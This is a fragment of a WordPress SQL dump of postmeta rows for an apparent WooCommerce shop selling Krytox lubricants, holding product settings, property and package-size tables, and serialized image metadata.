INSERT INTO `wp_postmeta` VALUES (12348, 1069, '317_default_editor', 'Quart, Gallon, 5 Gallon, 55 Gallon'); 
INSERT INTO `wp_postmeta` VALUES (12349, 1069, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (12350, 1069, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (12351, 1069, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12352, 1069, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12353, 1069, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (12354, 1069, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12355, 1069, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (12356, 1069, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (12357, 1069, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (12358, 1069, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (12359, 1069, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (12360, 1069, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (12361, 1069, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (12362, 1069, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (12363, 1069, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (12364, 1069, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (12365, 1069, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (12366, 1069, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (12367, 1069, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12368, 1069, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12369, 1069, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (12370, 1069, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (12371, 1069, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (12372, 1069, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (12373, 1069, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12374, 1069, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12375, 1069, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (12376, 1069, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (12377, 1069, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (12378, 1069, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (12379, 1075, '_wp_attached_file', '2016/08/gearbox-grease-krytox.jpg'); 
INSERT INTO `wp_postmeta` VALUES (12380, 1075, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4163;s:6:"height";i:2770;s:4:"file";s:33:"2016/08/gearbox-grease-krytox.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"gearbox-grease-krytox-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"gearbox-grease-krytox-800x532.jpg";s:5:"width";i:800;s:6:"height";i:532;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"gearbox-grease-krytox-768x511.jpg";s:5:"width";i:768;s:6:"height";i:511;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"gearbox-grease-krytox-1600x1065.jpg";s:5:"width";i:1600;s:6:"height";i:1065;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"gearbox-grease-krytox-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"gearbox-grease-krytox-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"gearbox-grease-krytox-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"gearbox-grease-krytox-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (12381, 1072, '_thumbnail_id', '1968'); 
INSERT INTO `wp_postmeta` VALUES (12382, 1072, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (12383, 1072, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (12384, 1072, '312_default_editor', '<table width="426">\r\n<tbody>\r\n<tr>\r\n<td width="202"><strong>Typical Properties</strong></td>\r\n<td style="text-align: center;" width="224"><strong>AGL 683</strong></td>\r\n</tr>\r\n<tr>\r\n<td><strong>Anti-corrosion additive</strong></td>\r\n<td style="text-align: center;">Yes</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Extreme pressure additive</strong></td>\r\n<td style="text-align: center;">Yes</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Temperature Range</strong></td>\r\n<td style="text-align: center;">-60°C to 120°C</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Base Oil Viscosity, cSt @ 40°C</strong></td>\r\n<td style="text-align: center;">32</td>\r\n</tr>\r\n<tr>\r\n<td><strong>NLGI Grade</strong></td>\r\n<td style="text-align: center;">0</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Specific Gravity at 0°C g/cm^3</strong></td>\r\n<td style="text-align: center;">2.1</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (12385, 1072, '716_default_editor', '<ul>\r\n 	<li>Gearbox</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (12386, 1072, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (12387, 1072, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;"><strong>Syringe</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="125"><strong>Tube</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Cartridge</strong></td>\r\n<td width="125">\r\n<p style="text-align: center;"><strong>Pail</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">0.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td width="125">\r\n<p style="text-align: center;">5 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125">7 kg</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (12388, 1072, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (12389, 1072, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (12390, 1072, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12391, 1072, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12392, 1072, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (12393, 1072, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12394, 1072, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (12395, 1072, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (12396, 1072, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (12397, 1072, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (12398, 1072, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (12399, 1072, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (12400, 1072, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (12401, 1072, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (12402, 1072, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (12403, 1072, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (12404, 1072, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (12405, 1072, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (12406, 1072, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12407, 1072, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12408, 1072, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (12409, 1072, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (12410, 1072, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (12411, 1072, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (12412, 1072, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12413, 1072, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12414, 1072, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (12415, 1072, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (12416, 1072, '_product_image_gallery', '380,377,375,381'); 
INSERT INTO `wp_postmeta` VALUES (12417, 1076, '_wp_attached_file', '2016/08/krytox-other-grease-oil.jpg'); 
INSERT INTO `wp_postmeta` VALUES (12418, 1076, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5616;s:6:"height";i:3744;s:4:"file";s:35:"2016/08/krytox-other-grease-oil.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:35:"krytox-other-grease-oil-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:35:"krytox-other-grease-oil-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:35:"krytox-other-grease-oil-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:37:"krytox-other-grease-oil-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:35:"krytox-other-grease-oil-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:35:"krytox-other-grease-oil-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:35:"krytox-other-grease-oil-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:35:"krytox-other-grease-oil-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"0";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (12419, 1077, '_edit_lock', '1487964335:2'); 
INSERT INTO `wp_postmeta` VALUES (12420, 1077, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (12421, 970, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (12422, 887, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (12423, 1078, '_wp_attached_file', '2016/08/PTFE-release-agent-Miller-Stephenson.jpg'); 
INSERT INTO `wp_postmeta` VALUES (12424, 1078, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4062;s:6:"height";i:2285;s:4:"file";s:48:"2016/08/PTFE-release-agent-Miller-Stephenson.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:48:"PTFE-release-agent-Miller-Stephenson-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:48:"PTFE-release-agent-Miller-Stephenson-800x450.jpg";s:5:"width";i:800;s:6:"height";i:450;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:48:"PTFE-release-agent-Miller-Stephenson-768x432.jpg";s:5:"width";i:768;s:6:"height";i:432;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:49:"PTFE-release-agent-Miller-Stephenson-1600x900.jpg";s:5:"width";i:1600;s:6:"height";i:900;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:48:"PTFE-release-agent-Miller-Stephenson-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:48:"PTFE-release-agent-Miller-Stephenson-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:48:"PTFE-release-agent-Miller-Stephenson-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:48:"PTFE-release-agent-Miller-Stephenson-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"7";s:8:"quantity";d:56;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (12425, 1079, '_wp_attached_file', '2016/08/krytox-tm7-grease.jpg'); 
INSERT INTO `wp_postmeta` VALUES (12426, 1079, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5760;s:6:"height";i:3840;s:4:"file";s:29:"2016/08/krytox-tm7-grease.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:29:"krytox-tm7-grease-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:29:"krytox-tm7-grease-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:29:"krytox-tm7-grease-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:31:"krytox-tm7-grease-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:29:"krytox-tm7-grease-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:29:"krytox-tm7-grease-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:29:"krytox-tm7-grease-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:29:"krytox-tm7-grease-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (12427, 1077, '_thumbnail_id', '1079'); 
INSERT INTO `wp_postmeta` VALUES (12428, 1077, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (12429, 1077, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (12430, 1077, '312_default_editor', '<table width="426">\r\n<tbody>\r\n<tr>\r\n<td width="202"><strong>Typical Properties</strong></td>\r\n<td style="text-align: center;" width="224"><strong>TM7</strong></td>\r\n</tr>\r\n<tr>\r\n<td><strong>Temperature Range</strong></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>°C</td>\r\n<td style="text-align: center;">-20-250</td>\r\n</tr>\r\n<tr>\r\n<td>°F</td>\r\n<td style="text-align: center;">-4-482</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Base Oil Viscosity, cSt </strong></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>@ 40°C</td>\r\n<td style="text-align: center;">500</td>\r\n</tr>\r\n<tr>\r\n<td>@ 100°C</td>\r\n<td style="text-align: center;">46</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Specific Gravity</strong></td>\r\n<td style="text-align: center;">2</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (12431, 1077, '716_default_editor', '<ul>\r\n 	<li>Molds</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (12432, 1077, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (12433, 1077, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;"><strong>Syringe</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="125"><strong>Tube</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Cartridge</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Pail</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">0.5 oz.</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td width="125">\r\n<p style="text-align: center;">5 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">1 oz.</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">7 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (12434, 1077, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (12435, 1077, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (12436, 1077, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12437, 1077, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12438, 1077, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (12439, 1077, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12440, 1077, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (12441, 1077, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (12442, 1077, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (12443, 1077, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (12444, 1077, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (12445, 1077, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (12446, 1077, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (12447, 1077, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (12448, 1077, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (12449, 1077, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (12450, 1077, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (12451, 1077, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (12452, 1077, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12453, 1077, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12454, 1077, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (12455, 1077, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (12456, 1077, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (12457, 1077, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (12458, 1077, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12459, 1077, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12460, 1077, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (12461, 1077, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (12462, 1077, '_product_image_gallery', '380,377,375,381'); 
INSERT INTO `wp_postmeta` VALUES (12463, 1080, '_wp_attached_file', '2016/08/krytox-gpl-oil-grease.jpg'); 
INSERT INTO `wp_postmeta` VALUES (12464, 1080, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4992;s:6:"height";i:3895;s:4:"file";s:33:"2016/08/krytox-gpl-oil-grease.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"krytox-gpl-oil-grease-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"krytox-gpl-oil-grease-800x624.jpg";s:5:"width";i:800;s:6:"height";i:624;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"krytox-gpl-oil-grease-768x599.jpg";s:5:"width";i:768;s:6:"height";i:599;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"krytox-gpl-oil-grease-1600x1248.jpg";s:5:"width";i:1600;s:6:"height";i:1248;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"krytox-gpl-oil-grease-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"krytox-gpl-oil-grease-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"krytox-gpl-oil-grease-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"krytox-gpl-oil-grease-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (12465, 1081, '_wp_attached_file', '2016/08/krytox-gpl-oil-grease1.jpg'); 
INSERT INTO `wp_postmeta` VALUES (12466, 1081, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3479;s:6:"height";i:2650;s:4:"file";s:34:"2016/08/krytox-gpl-oil-grease1.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"krytox-gpl-oil-grease1-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"krytox-gpl-oil-grease1-800x609.jpg";s:5:"width";i:800;s:6:"height";i:609;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"krytox-gpl-oil-grease1-768x585.jpg";s:5:"width";i:768;s:6:"height";i:585;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"krytox-gpl-oil-grease1-1600x1219.jpg";s:5:"width";i:1600;s:6:"height";i:1219;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"krytox-gpl-oil-grease1-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"krytox-gpl-oil-grease1-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"krytox-gpl-oil-grease1-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"krytox-gpl-oil-grease1-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (12467, 1082, '_wp_attached_file', '2016/08/krytox-gpl-oil-grease2.jpg'); 
